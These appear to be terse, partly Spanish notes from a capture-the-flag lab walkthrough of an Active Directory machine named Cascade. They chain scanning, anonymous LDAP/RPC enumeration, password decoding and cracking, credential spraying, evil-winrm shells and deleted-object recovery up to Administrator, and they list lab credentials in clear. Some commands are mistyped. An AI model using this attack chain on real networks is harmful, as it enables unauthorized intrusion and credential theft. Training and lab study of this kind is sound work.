nmap -A -p- -oA mango 10.129.1.219 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA mango 10.129.1.219
nmap -sU -O -p- -oA mango-udp 10.129.1.219
nikto -h 10.129.1.219:80
echo "10.129.205.71 cascade.local" | sudo tee -a /etc/hosts
rpcclient -U "" 10.129.205.71 -N
rpcclient -U "" 10.129.205.71 -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v "0x" | tr -d '[]'
sudo ./rpcenum -e DUsersInfo -i 10.129.205.71
Se usa GetNPUsers si tienes usuarios pero no contrasenas Pero no encontramos nada
python3 /opt/impacket/examples/GetNPUsers.py cascade.local/ -no-pass -usersfile users
Corremos lo siguiente con las herramientas de smbclient y smbmap
smbmap -H 10.129.205.71
smbclient -L 10.129.205.71 -N
ldapsearch -x -h 10.129.205.71 -b "dc=cascade,dc=local" | grep "@cascade.local"
ldapsearch -x -h 10.129.205.71 -b "dc=cascade,dc=local" | grep "@cascade.local" -A 20
echo "clk0bjVldmE=" | base64 -d; echo
rpcclient -U "" 10.129.205.71 -N -c "queryuser r.thompson"
crackmapexec smb 10.129.205.71 -u 'r.thompson' -p 'rY4n5eva'
Parece que no es un usuario que tenga acceso remoto
smbmap -H 10.129.205.71 -u 'r.thompson' -p 'rY4n5eva'
smbclient //10.129.205.71/Data -U 'r.thompson%rY4n5eva'
Como tenemos varios directorios
sudo mkdir /mnt/smbmounted
smb mount -t cifs //10.129.205.71/Data /mnt/smbmounted -o username=r.thompson,password=rY4n5eva,domain=cascade.local,rw
Para no estar viendo y metiendonos en un directorio haciendo cd .. cd directorio etc
cd /mnt/submounted
tree
cp /mnt/smbmounted/IT/Email\ Archives/Meeting Notes June 2018.html index.html
Vemos lo que se encuentra en index.html El usuario
pushd /mnt/smbmounted /mnt/smbmounted ~/Desktop/boxes/cascade/content
tree
cp /mnt/smbmounted/IT/Logs/Ark\ AD\Recycle\ Bin/ArkAdRecycleBin.log .
cat ArkAdRecycleBin.log
Vemos el archivo VNC Install.reg
grep -i "Ark" users
file VNC Install.reg
Para cambiarlo de hexadecimal a string
echo "6b,cf,2a,4b,6e,5a,ca,0f" | tr -d ',' | xxd -ps -r > password
https://github.com/jeroennijhof/vncpwd
./vncpwd ../password
crackmapexec smb 10.129.205.71 -u ../users -p 'sT333ve2'
crackmapexec smb 10.129.205.71 -u 's.smith' -p 'sT333ve2'
evil-winrm -i 10.129.205.71 -u 's.smith' -p 'sT333ve2'
net user
net user s.smith
smbmap -H 10.129.205.71 -u 's.smith' -p 'sT333ve2'
cd C:\Shares\Audit
smbclient //10.129.205.71/Audit$ -U 's.smith%sT333ve2'
download C:\Shares\Audit\CascAudit.exe
mv C:\\Shares\\Audit\\CascAudit.exe ../CascAudit.exe
Para bajar todos los archivos en smb
prompt off
recurse on
mget *
cd DB
file Audit.db
sqlite3 Audit.db
.tables
select * from Ldap;
echo "BQO5.." | base64 -d > arksvc_passwd
Encontramos el ejecutable CascAudit.exe
Lo (CascAudit.exe) abrimos con JetBrains dotPeek
Lo (Crypto.dll) abrimos con JetBrains dotPeek
Nos dirigimos a cyber chef. Introducimos la key y el vector IV
credenciales-> arksvc:w3lc0meFr31nd
evil-winrmm -t 10.129.205.71 -u 'arksvc' -p 'w3lc0meFr31nd'
whoami /priv
Get-ADObject -Filter 'Deleted -eq $true' -IncludeDeletedObjects -Properties *
echo "YmFDVDN.." | base64 -d
evil-winrmm -t 10.129.205.71 -u 'Administrator' -p 'baCT3r1aN00dles'